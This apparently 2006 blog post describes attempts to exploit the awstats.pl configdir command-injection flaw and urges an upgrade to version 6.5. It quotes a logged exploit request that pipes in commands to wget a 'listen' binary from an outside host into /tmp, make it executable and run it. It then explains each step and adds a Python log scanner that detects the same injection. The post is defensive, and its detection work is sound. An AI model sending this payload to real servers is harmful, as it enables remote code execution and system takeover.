Tuesday, February 07, 2006

Known awstats (awstats.pl) Vulnerability Logs - Update

For the last two weeks my httpd/apache access_log has been showered with GET requests trying to exploit a known vulnerability in awstats 6.3 and prior. This has been resolved in version 6.5 of awstats, so upgrade.

Awstats is a great log tool that generates advanced graphical statistics from your server logs. I have used it on many of my sites to generate graphical statistics. http://awstats.sourceforge.net/

However, a vulnerability has been identified in awstats (< 6.3) that could be exploited by attackers to execute arbitrary code and compromise a vulnerable system. The problem results from an input validation error in the "awstats.pl" file when handling the "configdir" parameter, which can be exploited to execute arbitrary commands using "|" characters.

So if you use awstats on your webserver and find these kinds of entries in your access_log, you should take action and consider your machine compromised. Upgrade to awstats version 6.5 immediately. Version 6.5 is available for download at:
http://awstats.sourceforge.net/#DOWNLOAD

Typical Exploit Attempt For Awstats.pl
GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bw
get%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2f
listen%20216%2e102%2e212%2e115;echo%20YYY;
echo| HTTP/1.1\n
Request Method: GET
Request URI: /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3b
wget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2f
listen%20216%2e102%2e212%2e115;echo%20YYY;
echo|


Explanation: If you are familiar with Unix/Linux you should be able to pick out the commands this string contains. First, after the GET request, comes the path to awstats.pl (a CGI script written in Perl; awstats.pl can be run from the command line too).

So after awstats.pl?configdir=|echo; you see echo %20YYY; and then cd (cd = change directory in Unix) to /tmp. Then wget (a utility for non-interactive download of files from the Web; it supports HTTP, HTTPS and FTP, as well as retrieval through HTTP proxies) fetches (ip address)/listen, followed by the change mode command chmod, which makes the downloaded listen file executable before the request runs it (the %2e%2f before listen is "./").
Is the listen file netcat? I will have to find out and get back on that one.
So check for an update in this posting if you are interested.
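As an added example (not code from the original post or from the awstats project), the following Python script does for a whole access_log what the explanation above does by hand: it parses each line, URL-decodes the configdir parameter of requests to awstats.pl, flags any value containing shell metacharacters such as "|" or ";", and splits a flagged value into the individual commands so they can be read one by one. The log lines are constructed samples; the client addresses and the download/callback hosts are documentation addresses (192.0.2.x, 203.0.113.x), not the ones from the real logs.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access_log lines (Apache combined format). Only the
# second line carries a configdir value with a pipe and command separators.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Feb/2006:03:12:44 +0100] "GET /awstats/awstats.pl?config=example.com HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
192.0.2.11 - - [07/Feb/2006:03:13:01 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20203%2e0%2e113%2e5%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20203%2e0%2e113%2e6;echo%20YYY;echo| HTTP/1.1" 200 1840 "-" "Mozilla/4.0"
192.0.2.12 - - [07/Feb/2006:03:14:22 +0100] "GET /index.html HTTP/1.1" 200 310 "-" "Mozilla/4.0"
192.0.2.13 - - [07/Feb/2006:03:15:09 +0100] "GET /awstats/awstats.pl?configdir=%2fetc%2fawstats HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
"""

# Fields of a combined-format line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Characters that have no business in a directory name but let a Perl
# open()/shell interpret the value as a command.
SHELL_META = re.compile(r'[|;`$&]')


def parse_line(line):
    """Return the named fields of one access_log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def configdir_value(uri):
    """URL-decoded configdir parameter of a request URI, or None if absent.

    The query is split by hand rather than with parse_qs so that ';' inside the
    value is preserved (older parse_qs versions treat ';' as a separator).
    """
    query = urlsplit(uri).query
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        if name == 'configdir':
            return unquote(value)
    return None


def is_awstats_injection(uri):
    """True when the request targets awstats.pl with a configdir holding shell metacharacters."""
    if not urlsplit(uri).path.endswith('/awstats.pl'):
        return False
    value = configdir_value(uri)
    return value is not None and SHELL_META.search(value) is not None


def decode_commands(uri):
    """Split a flagged configdir value into the individual shell commands it carries."""
    value = configdir_value(uri) or ''
    # The leading '|' is what turns the value into a command; the trailing '|'
    # just closes the pipe. Everything between is a ';'-separated command list.
    body = value.lstrip('|').rstrip('|')
    return [cmd.strip() for cmd in body.split(';') if cmd.strip()]


def scan(log_text):
    """Return one record per suspicious awstats.pl request found in log_text."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_awstats_injection(rec['uri']):
            hits.append({
                'ip': rec['ip'],
                'ts': rec['ts'],
                'commands': decode_commands(rec['uri']),
            })
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} awstats configdir injection:")
        for cmd in hit['commands']:
            print(f"    {cmd}")
```

Run against a real log with `scan(open('/var/log/httpd/access_log').read())`; a benign configdir such as /etc/awstats (the fourth sample line) is not flagged, because the check is on metacharacters in the decoded value, not merely on the presence of the parameter.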

